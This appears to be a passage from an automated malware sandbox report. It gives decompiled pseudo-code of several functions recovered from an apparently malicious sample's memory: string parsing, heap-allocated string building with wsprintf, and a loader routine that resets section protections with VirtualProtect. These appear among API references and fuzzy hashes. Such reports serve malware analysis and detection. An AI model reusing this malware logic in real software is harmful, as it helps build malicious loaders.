                                                                                                                                                                                                    0x04f632ab
                                                                                                                                                                                                    0x04f632af
                                                                                                                                                                                                    0x04f632c0
                                                                                                                                                                                                    0x04f632b1
                                                                                                                                                                                                    0x04f632b6
                                                                                                                                                                                                    0x04f632bb
                                                                                                                                                                                                    0x04f632ca
                                                                                                                                                                                                    0x04f632ca
                                                                                                                                                                                                    0x04f6329f
                                                                                                                                                                                                    0x04f632d0
                                                                                                                                                                                                    0x04f632d6
                                                                                                                                                                                                    0x04f632d6
                                                                                                                                                                                                    0x04f632df
                                                                                                                                                                                                    0x04f632e4
                                                                                                                                                                                                    0x04f632e4
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1198164300-0
                                                                                                                                                                                                    • Opcode ID: d7e7839b5c73498487acb2064fcfe2b50851322b47ffc30773c1ad8dae15b6a0
                                                                                                                                                                                                    • Instruction ID: 67fabe42f19e1006bfb6f92c23641c059f635d290724e2be84a238a66e908bd3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7e7839b5c73498487acb2064fcfe2b50851322b47ffc30773c1ad8dae15b6a0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5214F75A00209FFCB11DFE8D98499EBBB8FF49314B108169ED46E7214EB30EA45DB60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                    			E04F6203C(char* __eax) {
                                                                                                                                                                                                    				char* _t8;
                                                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                                                    				char* _t21;
                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                    				char* _t24;
                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t21 = __eax;
                                                                                                                                                                                                    				_push(0x20);
                                                                                                                                                                                                    				_t23 = 1;
                                                                                                                                                                                                    				_push(__eax);
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t8 = StrChrA();
                                                                                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t23 = _t23 + 1;
                                                                                                                                                                                                    					_push(0x20);
                                                                                                                                                                                                    					_push( &(_t8[1]));
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t12 = E04F68D59(_t23 << 2);
                                                                                                                                                                                                    				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                                                                                                                                                                    				if(_t12 != 0) {
                                                                                                                                                                                                    					StrTrimA(_t21, 0x4f6c29c); // executed
                                                                                                                                                                                                    					_t26 = 0;
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t24 = StrChrA(_t21, 0x20);
                                                                                                                                                                                                    						if(_t24 != 0) {
                                                                                                                                                                                                    							 *_t24 = 0;
                                                                                                                                                                                                    							_t24 =  &(_t24[1]);
                                                                                                                                                                                                    							StrTrimA(_t24, 0x4f6c29c);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                                                                                                                                                                                    						_t26 = _t26 + 1;
                                                                                                                                                                                                    						_t21 = _t24;
                                                                                                                                                                                                    					} while (_t24 != 0);
                                                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}










                                                                                                                                                                                                    0x04f62047
                                                                                                                                                                                                    0x04f6204b
                                                                                                                                                                                                    0x04f6204d
                                                                                                                                                                                                    0x04f6204e
                                                                                                                                                                                                    0x04f62056
                                                                                                                                                                                                    0x04f62056
                                                                                                                                                                                                    0x04f6205a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f62051
                                                                                                                                                                                                    0x04f62052
                                                                                                                                                                                                    0x04f62055
                                                                                                                                                                                                    0x04f62055
                                                                                                                                                                                                    0x04f62062
                                                                                                                                                                                                    0x04f62067
                                                                                                                                                                                                    0x04f6206d
                                                                                                                                                                                                    0x04f62075
                                                                                                                                                                                                    0x04f6207b
                                                                                                                                                                                                    0x04f6207d
                                                                                                                                                                                                    0x04f62082
                                                                                                                                                                                                    0x04f62086
                                                                                                                                                                                                    0x04f62088
                                                                                                                                                                                                    0x04f6208b
                                                                                                                                                                                                    0x04f62092
                                                                                                                                                                                                    0x04f62092
                                                                                                                                                                                                    0x04f6209c
                                                                                                                                                                                                    0x04f6209f
                                                                                                                                                                                                    0x04f620a0
                                                                                                                                                                                                    0x04f620a2
                                                                                                                                                                                                    0x04f620ae
                                                                                                                                                                                                    0x04f620ae
                                                                                                                                                                                                    0x04f620bb

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,00000020,00000000,059295AC,?,04F65068,?,04F69777,059295AC,?,04F65068), ref: 04F62056
                                                                                                                                                                                                    • StrTrimA.KERNELBASE(?,04F6C29C,00000002,?,04F65068,?,04F69777,059295AC,?,04F65068), ref: 04F62075
                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,00000020,?,04F65068,?,04F69777,059295AC,?,04F65068), ref: 04F62080
                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000001,04F6C29C,?,04F65068,?,04F69777,059295AC,?,04F65068), ref: 04F62092
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Trim
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3043112668-0
                                                                                                                                                                                                    • Opcode ID: 71a58d09554c8b29e77fcbcec967b34dbfe691cf73a2067b946cee79ec3f7c89
                                                                                                                                                                                                    • Instruction ID: 5421f131fad54fb8d667f6941a4eab53ea4a553238ebf9555d42fa711da4824c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71a58d09554c8b29e77fcbcec967b34dbfe691cf73a2067b946cee79ec3f7c89
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D901F571B01315BBD231BE669C48F2BBF98EB96A90F020548F893D7241DB61E803C6A0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E04F65C8C() {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                    				WCHAR* _v16;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				intOrPtr _t24;
                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                                                    				intOrPtr _t35;
                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                    				void* _t51;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                    				_t23 = E04F6576C(0,  &_v8); // executed
                                                                                                                                                                                                    				if(_t23 != 0) {
                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t24 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    				_t4 = _t24 + 0x4f6edd0; // 0x5929378
                                                                                                                                                                                                    				_t5 = _t24 + 0x4f6ed78; // 0x4f0053
                                                                                                                                                                                                    				_t26 = E04F62AFE( &_v16, _v8, _t5, _t4); // executed
                                                                                                                                                                                                    				_t45 = _t26;
                                                                                                                                                                                                    				if(_t45 == 0) {
                                                                                                                                                                                                    					StrToIntExW(_v16, 0,  &_v12);
                                                                                                                                                                                                    					_t45 = 8;
                                                                                                                                                                                                    					if(_v12 < _t45) {
                                                                                                                                                                                                    						_t45 = 1;
                                                                                                                                                                                                    						__eflags = 1;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t32 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    						_t11 = _t32 + 0x4f6edc4; // 0x592936c
                                                                                                                                                                                                    						_t48 = _t11;
                                                                                                                                                                                                    						_t12 = _t32 + 0x4f6ed78; // 0x4f0053
                                                                                                                                                                                                    						_t51 = E04F61FE0(_t11, _t12, _t11);
                                                                                                                                                                                                    						_t58 = _t51;
                                                                                                                                                                                                    						if(_t51 != 0) {
                                                                                                                                                                                                    							_t35 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    							_t13 = _t35 + 0x4f6ee0e; // 0x30314549
                                                                                                                                                                                                    							if(E04F66C44(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
                                                                                                                                                                                                    								_t60 =  *0x4f6d25c - 6;
                                                                                                                                                                                                    								if( *0x4f6d25c <= 6) {
                                                                                                                                                                                                    									_t42 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    									_t15 = _t42 + 0x4f6ec2a; // 0x52384549
                                                                                                                                                                                                    									E04F66C44(_t48, _t60, _v8, _t51, _t15, 0x13);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t38 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    							_t17 = _t38 + 0x4f6ee08; // 0x59293b0
                                                                                                                                                                                                    							_t18 = _t38 + 0x4f6ede0; // 0x680043
                                                                                                                                                                                                    							_t45 = E04F65931(_v8, 0x80000001, _t51, _t18, _t17);
                                                                                                                                                                                                    							HeapFree( *0x4f6d238, 0, _t51);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					HeapFree( *0x4f6d238, 0, _v16);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t53 = _v8;
                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                    					E04F63822(_t53);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t45;
                                                                                                                                                                                                    			}

















                                                                                                                                                                                                    0x04f65c9c
                                                                                                                                                                                                    0x04f65c9f
                                                                                                                                                                                                    0x04f65ca6
                                                                                                                                                                                                    0x04f65ca8
                                                                                                                                                                                                    0x04f65ca8
                                                                                                                                                                                                    0x04f65cab
                                                                                                                                                                                                    0x04f65cb0
                                                                                                                                                                                                    0x04f65cb7
                                                                                                                                                                                                    0x04f65cc4
                                                                                                                                                                                                    0x04f65cc9
                                                                                                                                                                                                    0x04f65ccd
                                                                                                                                                                                                    0x04f65cdb
                                                                                                                                                                                                    0x04f65ce9
                                                                                                                                                                                                    0x04f65ced
                                                                                                                                                                                                    0x04f65d7e
                                                                                                                                                                                                    0x04f65d7e
                                                                                                                                                                                                    0x04f65cf3
                                                                                                                                                                                                    0x04f65cf3
                                                                                                                                                                                                    0x04f65cf8
                                                                                                                                                                                                    0x04f65cf8
                                                                                                                                                                                                    0x04f65cff
                                                                                                                                                                                                    0x04f65d0b
                                                                                                                                                                                                    0x04f65d0d
                                                                                                                                                                                                    0x04f65d0f
                                                                                                                                                                                                    0x04f65d11
                                                                                                                                                                                                    0x04f65d18
                                                                                                                                                                                                    0x04f65d2a
                                                                                                                                                                                                    0x04f65d2c
                                                                                                                                                                                                    0x04f65d33
                                                                                                                                                                                                    0x04f65d35
                                                                                                                                                                                                    0x04f65d3c
                                                                                                                                                                                                    0x04f65d47
                                                                                                                                                                                                    0x04f65d47
                                                                                                                                                                                                    0x04f65d33
                                                                                                                                                                                                    0x04f65d4c
                                                                                                                                                                                                    0x04f65d51
                                                                                                                                                                                                    0x04f65d58
                                                                                                                                                                                                    0x04f65d76
                                                                                                                                                                                                    0x04f65d78
                                                                                                                                                                                                    0x04f65d78
                                                                                                                                                                                                    0x04f65d0f
                                                                                                                                                                                                    0x04f65d8a
                                                                                                                                                                                                    0x04f65d8a
                                                                                                                                                                                                    0x04f65d8c
                                                                                                                                                                                                    0x04f65d91
                                                                                                                                                                                                    0x04f65d93
                                                                                                                                                                                                    0x04f65d93
                                                                                                                                                                                                    0x04f65d9e

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05929378,00000000,?,7519F710,00000000,7519F730), ref: 04F65CDB
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,059293B0,?,00000000,30314549,00000014,004F0053,0592936C), ref: 04F65D78
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04F62885), ref: 04F65D8A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                    • Opcode ID: aedb512a9230c8e981692ee1e0ada2b39c987e3d0d0439fc00d7736d30b1bd8b
                                                                                                                                                                                                    • Instruction ID: 831e87f2ffd4c120589420eb573b0ad1437bc8bba1d91f5eb6997e058700cf3e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: aedb512a9230c8e981692ee1e0ada2b39c987e3d0d0439fc00d7736d30b1bd8b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF319E36A00108FFEB10EBA4ED88E9E7BBDEB48744F154065E516AB060D770EE06DB60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                                                                                    			E04F69425(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				intOrPtr _t19;
                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                    				void* _t44;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t37 = __edx;
                                                                                                                                                                                                    				_t33 = __ecx;
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t43 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    				_push(0x800);
                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                    				_push( *0x4f6d238);
                                                                                                                                                                                                    				_t1 = _t43 + 0x4f6e791; // 0x6976612e
                                                                                                                                                                                                    				_t44 = _t1;
                                                                                                                                                                                                    				if( *0x4f6d24c >= 5) {
                                                                                                                                                                                                    					if(RtlAllocateHeap() == 0) {
                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                    						_t31 = 8;
                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                    						if(_t31 != 0) {
                                                                                                                                                                                                    							L10:
                                                                                                                                                                                                    							 *0x4f6d24c =  *0x4f6d24c + 1;
                                                                                                                                                                                                    							L11:
                                                                                                                                                                                                    							return _t31;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t46 = _a4;
                                                                                                                                                                                                    						_t41 = _v8;
                                                                                                                                                                                                    						 *_a16 = _a4;
                                                                                                                                                                                                    						 *_a20 = E04F64D95(_a4, _t41); // executed
                                                                                                                                                                                                    						_t19 = E04F6315A(_t41, _t41, _t46); // executed
                                                                                                                                                                                                    						if(_t19 != 0) {
                                                                                                                                                                                                    							 *_a8 = _t41;
                                                                                                                                                                                                    							 *_a12 = _t19;
                                                                                                                                                                                                    							if( *0x4f6d24c < 5) {
                                                                                                                                                                                                    								 *0x4f6d24c =  *0x4f6d24c & 0x00000000;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t31 = 0xbf;
                                                                                                                                                                                                    						E04F65BEA();
                                                                                                                                                                                                    						RtlFreeHeap( *0x4f6d238, 0, _t41); // executed
                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t25 = E04F61D4C(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					_t31 = _t25;
                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t26 = RtlAllocateHeap(); // executed
                                                                                                                                                                                                    				if(_t26 == 0) {
                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t25 = E04F612C4(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
                                                                                                                                                                                                    				goto L5;
                                                                                                                                                                                                    			}













                                                                                                                                                                                                    0x04f69425
                                                                                                                                                                                                    0x04f69425
                                                                                                                                                                                                    0x04f69428
                                                                                                                                                                                                    0x04f69429
                                                                                                                                                                                                    0x04f69433
                                                                                                                                                                                                    0x04f6943a
                                                                                                                                                                                                    0x04f6943f
                                                                                                                                                                                                    0x04f69441
                                                                                                                                                                                                    0x04f69447
                                                                                                                                                                                                    0x04f69447
                                                                                                                                                                                                    0x04f6944d
                                                                                                                                                                                                    0x04f69475
                                                                                                                                                                                                    0x04f6948d
                                                                                                                                                                                                    0x04f6948f
                                                                                                                                                                                                    0x04f69490
                                                                                                                                                                                                    0x04f69492
                                                                                                                                                                                                    0x04f694d0
                                                                                                                                                                                                    0x04f694d0
                                                                                                                                                                                                    0x04f694d6
                                                                                                                                                                                                    0x04f694dc
                                                                                                                                                                                                    0x04f694dc
                                                                                                                                                                                                    0x04f69494
                                                                                                                                                                                                    0x04f6949a
                                                                                                                                                                                                    0x04f6949d
                                                                                                                                                                                                    0x04f694ac
                                                                                                                                                                                                    0x04f694ae
                                                                                                                                                                                                    0x04f694b5
                                                                                                                                                                                                    0x04f694e9
                                                                                                                                                                                                    0x04f694ee
                                                                                                                                                                                                    0x04f694f0
                                                                                                                                                                                                    0x04f694f2
                                                                                                                                                                                                    0x04f694f2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f694f0
                                                                                                                                                                                                    0x04f694b7
                                                                                                                                                                                                    0x04f694bc
                                                                                                                                                                                                    0x04f694ca
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f694ca
                                                                                                                                                                                                    0x04f69484
                                                                                                                                                                                                    0x04f69489
                                                                                                                                                                                                    0x04f69489
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f69489
                                                                                                                                                                                                    0x04f6944f
                                                                                                                                                                                                    0x04f69457
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f69466
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04F6944F
                                                                                                                                                                                                      • Part of subcall function 04F612C4: GetTickCount.KERNEL32 ref: 04F612D8
                                                                                                                                                                                                      • Part of subcall function 04F612C4: wsprintfA.USER32 ref: 04F61328
                                                                                                                                                                                                      • Part of subcall function 04F612C4: wsprintfA.USER32 ref: 04F61345
                                                                                                                                                                                                      • Part of subcall function 04F612C4: wsprintfA.USER32 ref: 04F61371
                                                                                                                                                                                                      • Part of subcall function 04F612C4: HeapFree.KERNEL32(00000000,?), ref: 04F61383
                                                                                                                                                                                                      • Part of subcall function 04F612C4: wsprintfA.USER32 ref: 04F613A4
                                                                                                                                                                                                      • Part of subcall function 04F612C4: HeapFree.KERNEL32(00000000,?), ref: 04F613B4
                                                                                                                                                                                                      • Part of subcall function 04F612C4: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F613E2
                                                                                                                                                                                                      • Part of subcall function 04F612C4: GetTickCount.KERNEL32 ref: 04F613F3
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04F6946D
                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000002,04F628D0,?,04F628D0,00000002,?,?,04F650A1,?), ref: 04F694CA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1676223858-0
                                                                                                                                                                                                    • Opcode ID: d17ca461a94c8a74dcabbb162eeecacdbde9ed9d54b55ebc146b7b56cba572c2
                                                                                                                                                                                                    • Instruction ID: dfe2e210022b516e2053ceee34bc5ce3698736832bf1f4ac7bd974488dce94fd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d17ca461a94c8a74dcabbb162eeecacdbde9ed9d54b55ebc146b7b56cba572c2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 612139B6701209EBEB119F55EC44E9B37ACEB48744F118126F912DB240DBB4FD0A9BA1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E004015BC(void* __eax, void* _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                    				long _v16;
                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                    				signed int _t31;
                                                                                                                                                                                                    				long _t33;
                                                                                                                                                                                                    				int _t34;
                                                                                                                                                                                                    				signed int _t35;
                                                                                                                                                                                                    				signed int _t42;
                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                    				void* _t51;
                                                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                    				_t42 =  *(__eax + 6) & 0x0000ffff;
                                                                                                                                                                                                    				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                                                                                                                                                                    				_v20 = _t42;
                                                                                                                                                                                                    				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                    				if(_t42 <= 0) {
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					return _v12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t51 = _t50 + 0x24;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t54 = _v12;
                                                                                                                                                                                                    					if(_t54 != 0) {
                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					asm("bt dword [esi], 0x1d");
                                                                                                                                                                                                    					if(_t54 >= 0) {
                                                                                                                                                                                                    						asm("bt dword [esi], 0x1e");
                                                                                                                                                                                                    						if(__eflags >= 0) {
                                                                                                                                                                                                    							_t33 = 4;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							asm("bt dword [esi], 0x1f");
                                                                                                                                                                                                    							_t35 = 0;
                                                                                                                                                                                                    							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						asm("bt dword [esi], 0x1f");
                                                                                                                                                                                                    						asm("sbb eax, eax");
                                                                                                                                                                                                    						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						_v12 = GetLastError();
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t51 = _t51 + 0x28;
                                                                                                                                                                                                    					_v8 = _v8 + 1;
                                                                                                                                                                                                    					_t31 = _v8;
                                                                                                                                                                                                    					if(_t31 < _v20) {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                    			}















                                                                                                                                                                                                    0x004015c6
                                                                                                                                                                                                    0x004015cb
                                                                                                                                                                                                    0x004015d7
                                                                                                                                                                                                    0x004015e4
                                                                                                                                                                                                    0x004015ea
                                                                                                                                                                                                    0x004015ec
                                                                                                                                                                                                    0x004015f2
                                                                                                                                                                                                    0x0040165f
                                                                                                                                                                                                    0x00401666
                                                                                                                                                                                                    0x00401666
                                                                                                                                                                                                    0x004015f4
                                                                                                                                                                                                    0x004015f7
                                                                                                                                                                                                    0x004015f7
                                                                                                                                                                                                    0x004015fb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004015fd
                                                                                                                                                                                                    0x00401601
                                                                                                                                                                                                    0x00401619
                                                                                                                                                                                                    0x0040161d
                                                                                                                                                                                                    0x00401631
                                                                                                                                                                                                    0x0040161f
                                                                                                                                                                                                    0x0040161f
                                                                                                                                                                                                    0x00401625
                                                                                                                                                                                                    0x00401629
                                                                                                                                                                                                    0x00401629
                                                                                                                                                                                                    0x00401603
                                                                                                                                                                                                    0x00401603
                                                                                                                                                                                                    0x0040160f
                                                                                                                                                                                                    0x00401614
                                                                                                                                                                                                    0x00401614
                                                                                                                                                                                                    0x00401642
                                                                                                                                                                                                    0x00401646
                                                                                                                                                                                                    0x0040164e
                                                                                                                                                                                                    0x0040164e
                                                                                                                                                                                                    0x00401651
                                                                                                                                                                                                    0x00401654
                                                                                                                                                                                                    0x00401657
                                                                                                                                                                                                    0x0040165d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040165d
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 004015EA
                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 00401642
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00401648
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.622657691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.622723835.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ProtectVirtual$ErrorLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1469625949-0
                                                                                                                                                                                                    • Opcode ID: eda2a450a22bf817af5c1d2cc3c008d6ac39f138a2e54ba01d8621f786c9c9d1
